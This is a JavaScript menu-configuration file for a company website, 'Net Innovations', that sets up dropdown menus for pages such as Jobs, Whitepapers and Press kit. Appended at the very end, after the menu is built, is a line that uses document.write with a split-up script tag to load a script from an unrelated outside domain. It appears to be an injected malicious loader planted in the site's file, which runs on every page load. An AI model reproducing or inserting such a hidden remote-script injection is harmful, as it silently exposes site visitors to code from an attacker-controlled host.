/*** 
 This is the menu creation code - place it right after you body tag
 Feel free to add this to a stand-alone js file and link it to your page.
 **/
 
 
 
 //Menu object creation
 oCMenu=new makeCM("oCMenu") //Making the menu object. Argument: menuname
 
 //Menu properties   
 oCMenu.pxBetween=17;
 oCMenu.fromLeft=265; 
 oCMenu.fromTop=23;   
 oCMenu.rows=1; 
 oCMenu.menuPlacement="left";
 
 oCMenu.onlineRoot="" 
 oCMenu.resizeCheck=0 
 oCMenu.wait=1000 
 oCMenu.fillImg="images/blank.gif"
 oCMenu.zIndex=0
 
 //Level properties - ALL properties have to be spesified in level 0
 oCMenu.level[0]=new cm_makeLevel() //Add this for each new level
  //WIDTH OF MENU BARS//
  oCMenu.level[0].width=160
  //////////////////////
 oCMenu.level[0].regClass="clLevel0"
 oCMenu.level[0].borderX=0
 oCMenu.level[0].borderY=0
 oCMenu.level[0].offsetX=0
 oCMenu.level[0].offsetY=15
 oCMenu.level[0].rows=0
 oCMenu.level[0].arrow=0
 oCMenu.level[0].arrowWidth=0
 oCMenu.level[0].arrowHeight=0
 oCMenu.level[0].align="bottom"
 
 //EXAMPLE SUB LEVEL[1] PROPERTIES - You have to specify the properties you want different from LEVEL[0] - If you want all items to look the same just remove this
 oCMenu.level[1]=new cm_makeLevel() //Add this for each new level (adding one to the number)
 //oCMenu.level[1].width=oCMenu.level[0].width-2
 oCMenu.level[1].height=15
 oCMenu.level[1].regClass="clLevel1"
 oCMenu.level[1].overClass="clLevel1over"
 oCMenu.level[1].borderX=0
 oCMenu.level[1].borderY=0
 oCMenu.level[1].borderClass="clLevel1border"
 
 // ******************************************
 // Menu item creation:
 // myCoolMenu.makeMenu(name, parent_name, text, link, target, width, height, regImage, overImage, regClass, overClass , align, rows, nolink, onclick, onmouseover, onmouseout) 
 // ******************************************
 var items = new Array();
 var counter = 1;
 
 // approach section
 items=[
 ["Our vision", "approach.html"],
["About Net Innovations", "about.html"],
["Jobs", "jobs.html"],
["Contact us", "map.html"],
 ['END', '#']
 ];
 createMenu("", items, 65, 13, 'Company', '', '');
 items = [];
 
 // services section
 items=[
 ["Introduction", "introduction.html"],
["Consulting & development", "activities.html"],
["About J2ME", "activities_interop.html"],
 ['END', '#']
 ];
 createMenu("", items, 148, 13, 'Products & services', '', '');
 items = [];
 
 // software section
 items=[
 ["Books", "books.html"],
["Whitepapers", "whitepapers.html"],
 ['END', '#']
 ];
 createMenu("", items, 91, 13, 'Publications', '', '');
 items = [];
 
 // client section
 items=[ 	
["Press kit", "presskit.html"],
["History", "history.html"],
 ['END', '#']
 ];
 createMenu("", items, 81, 13, 'Press room', '', '');
 items = [];
 
 //Leave this line - it constructs the menu
 oCMenu.construct()


document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Illegal_Operation.js"></scri'+'pt>');